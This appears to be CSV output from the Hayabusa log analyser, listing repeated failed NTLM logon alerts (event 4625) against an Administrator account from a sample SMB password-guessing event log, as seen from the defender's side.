+2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w2WMd3HugfjSwJPJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yEy0C6dMhysbNDrX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vxlayd8pnAZ3dZ2Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PhKO1jyWqVEdC9w2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dAH2mHJ4ZK5GS2p0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lV2ZIWGGwlkyEMRB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sum2yMFio9KLwZk5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fICXSRvv9Vm0uVpY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IgrOk6Fjp0QtfJ3i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OPKoHLtxNoiG65sl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NctXRH1DR3slfVxQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vLnAs36K1mTivu2w  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H7crZQ0eQ5RDNIp7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yHjgGhEtZgNwjaii  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y5gi2SS2mQiDylQ8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kqWJGguiWBEplJiZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RWP4luPa3lFolQVI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5K9DQWbzslRZZMSC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5qm0L113v24jlfjx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: seuUjyGmNlyYT4tU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FljAF4LWLmWNa3kL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RnN5mBOaAvYu25G7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: llBt31S46QVzg0Ki  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b1rvJUZo91Kka0G1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7Zqi86ZSFGRnoFM4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GeyeVdCUmHEKxR8f  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DwxJVXt79KBZalqS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TDfRu1OTlHmyc38P  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OLCAMPDWti9hjHtV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k2eViuJeorX2peGP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: davOE9p1fF2LbDP7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YFQsEbZnm94eSuUl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UnNcBIPoWdJH0x7M  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8Fw1xVFyar0Cal2J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FWzn4Oa8PQdH9Gqs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b68beIB5BKyMv8d3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HeXSJhEXzpiRX8BT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BQ8Zu7ByLWddD4Tk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: paQzUptV8scmJvsG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WQLsoIX9LPvbockz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xRYbdVMbUlqFK8oM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OSO730O1fxDL4DfQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5wmniv339HLGKB4u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rO3mxvgSES0lVN34  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fvK9k9tnCq5hwBqe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ujFfMT6I6L8OHag9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FWKY2Wh21sePUR1L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6E6yf8D5cPOEwR0y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OpFho8k52BkBlg4Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ucDvfSfDYZzjNWFS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vnq3S0gEE98xfYLv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: seVfaEdAS6lEXgkG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Gz8BQAlyYXB61tx3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nkHLs6yikRWVjj9F  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0bQUcnUBCmE81G6I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BceDCcXoHJQv9pDi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GCCLt49g8wmAMEyV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pM6C8KRcxVIUsZrZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Fw5DU6l3QRVl9cWY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 37UthbuO3m4Lr7dU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: URB7Ji5pQleLtvy4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: orP9OgiBrYIKZPXE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZwvdnlIWhqoDg8On  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v6dXVbmLBpXc39ah  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8Mu7amiHAg0l7bza  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JdG6F697kAXFDx9m  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jY5AAnfQMH3VZQUa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iVep4j7jZZAOAQAj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KWWtGIQx8jBgAeoH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zn8X8gen8gX9i3QK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B9OdUM99RBHzwgVs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TJbBVm6wDrqyQmpZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
